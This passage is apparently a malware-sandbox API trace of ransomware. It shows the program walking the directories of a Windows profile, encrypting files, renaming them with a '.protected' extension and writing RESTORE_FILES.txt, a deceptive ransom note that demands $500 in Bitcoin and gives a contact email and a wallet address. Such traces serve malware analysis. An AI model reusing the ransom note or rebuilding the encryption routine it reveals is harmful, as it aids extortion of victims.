hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.476] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0093.476] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0093.476] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0093.476] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0093.476] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0093.476] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft") returned 44 [0093.476] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0093.476] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0093.476] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*") returned 46 [0093.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.487] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.487] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.488] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.488] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.488] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.488] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\.") returned 46 [0093.488] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.488] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.488] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.488] lstrcmpiW (lpString1="..", 
lpString2="Program Files") returned -1 [0093.488] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.488] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.488] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.488] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\..") returned 47 [0093.488] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.488] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.488] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.488] lstrcmpiW (lpString1="Credentials", lpString2="Windows") returned -1 [0093.488] lstrcmpiW (lpString1="Credentials", lpString2="Program Files") returned -1 [0093.488] lstrcmpiW (lpString1="Credentials", lpString2="Program Files (x86)") returned -1 [0093.488] lstrcmpiW (lpString1="Credentials", lpString2="$Recycle.bin") returned 1 [0093.488] lstrcmpiW (lpString1="Credentials", lpString2="System Volume Information") returned -1 [0093.488] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials") returned 56 [0093.488] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0093.488] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0093.489] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\*") returned 58 [0093.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.489] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.489] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.489] lstrcmpiW (lpString1=".", 
lpString2="Program Files (x86)") returned -1 [0093.489] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.489] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.489] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\.") returned 58 [0093.489] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.489] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.489] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.489] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.489] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\." 
(normalized: "c:\\users\\default\\appdata\\local\\microsoft\\credentials\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.489] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.489] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.489] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.489] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.489] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.489] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.489] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\..") returned 59 [0093.490] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.490] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.490] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.490] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.490] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.490] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\.." 
(normalized: "c:\\users\\default\\appdata\\local\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.490] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.490] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.490] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\RESTORE_FILES.txt") returned 74 [0093.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\credentials\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0093.491] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.491] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0093.491] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.491] WriteFile (in: hFile=0xd8, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0093.492] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.492] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0093.492] CloseHandle (hObject=0xd8) returned 1 [0093.492] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.492] lstrcmpiW (lpString1="Feeds", lpString2="Windows") returned -1 [0093.492] lstrcmpiW (lpString1="Feeds", lpString2="Program Files") returned -1 [0093.492] lstrcmpiW (lpString1="Feeds", lpString2="Program Files (x86)") returned -1 [0093.492] lstrcmpiW (lpString1="Feeds", lpString2="$Recycle.bin") returned 1 [0093.492] lstrcmpiW (lpString1="Feeds", lpString2="System Volume Information") returned -1 [0093.492] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds") returned 50 [0093.492] lstrcmpW (lpString1="Feeds", lpString2=".") returned 1 [0093.492] lstrcmpW (lpString1="Feeds", lpString2="..") returned 1 [0093.492] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\*") returned 52 [0093.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.509] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.509] lstrcmpiW (lpString1=".", 
lpString2="Program Files") returned -1 [0093.509] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.509] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.509] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.509] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\.") returned 52 [0093.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.509] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.509] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.509] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.509] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.509] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.509] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.509] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\..") returned 53 [0093.509] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.509] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.509] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.509] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="Windows") returned -1 [0093.509] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="Program Files") returned -1 [0093.509] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="Program Files (x86)") returned -1 [0093.509] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="$Recycle.bin") returned 1 [0093.509] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="System Volume Information") returned -1 [0093.509] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 72 [0093.509] StrStrIW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".protected") returned 0x0 [0093.509] lstrcmpW (lpString1="FeedsStore.feedsdb-ms", lpString2="RESTORE_FILES.txt") returned -1 [0093.510] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.510] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.510] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 72 [0093.510] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".txt") returned 0x0 [0093.510] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 72 [0093.510] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".rar") returned 0x0 [0093.510] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 72 [0093.510] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".zip") returned 0x0 [0093.510] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x1a00, lpOverlapped=0x0) returned 1 [0093.514] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffe600, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0093.514] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x1a00, lpOverlapped=0x0) returned 1 [0093.514] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.514] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.514] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.514] CloseHandle (hObject=0x14c) returned 1 [0093.515] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.protected") returned 82 [0093.515] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.protected")) returned 1 [0093.515] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.516] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="Windows") returned -1 [0093.516] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="Program Files") returned -1 [0093.516] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="Program Files (x86)") returned -1 [0093.516] lstrcmpiW 
(lpString1="Microsoft Feeds~", lpString2="$Recycle.bin") returned 1 [0093.516] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="System Volume Information") returned -1 [0093.516] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 67 [0093.516] lstrcmpW (lpString1="Microsoft Feeds~", lpString2=".") returned 1 [0093.516] lstrcmpW (lpString1="Microsoft Feeds~", lpString2="..") returned 1 [0093.516] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*") returned 69 [0093.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.522] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.522] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.522] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.522] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.522] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.522] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\.") returned 69 [0093.522] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.522] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.522] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.522] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.522] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.522] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.522] lstrcmpiW (lpString1="..", 
lpString2="System Volume Information") returned -1 [0093.522] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\..") returned 70 [0093.522] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.522] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.522] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.522] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="Windows") returned -1 [0093.522] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="Program Files") returned -1 [0093.522] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="Program Files (x86)") returned -1 [0093.522] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="$Recycle.bin") returned 1 [0093.522] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="System Volume Information") returned -1 [0093.522] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 94 [0093.523] StrStrIW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".protected") returned 0x0 [0093.523] lstrcmpW (lpString1="Microsoft at Home~.feed-ms", lpString2="RESTORE_FILES.txt") returned -1 [0093.523] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.523] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.524] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 94 [0093.524] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".txt") returned 0x0 [0093.524] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 94 [0093.524] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".rar") returned 0x0 [0093.524] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 94 [0093.524] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".zip") returned 0x0 [0093.525] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.547] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.547] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.547] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.547] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.548] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.548] CloseHandle (hObject=0x150) returned 1 [0093.548] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.protected") returned 104 [0093.548] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms.protected")) returned 1 [0093.549] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.549] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="Windows") returned -1 [0093.549] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="Program Files") returned -1 [0093.549] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="Program Files (x86)") returned -1 [0093.549] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="$Recycle.bin") returned 1 [0093.549] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="System Volume Information") returned -1 [0093.549] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 94 [0093.549] StrStrIW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".protected") returned 0x0 [0093.549] lstrcmpW (lpString1="Microsoft at Work~.feed-ms", lpString2="RESTORE_FILES.txt") returned -1 
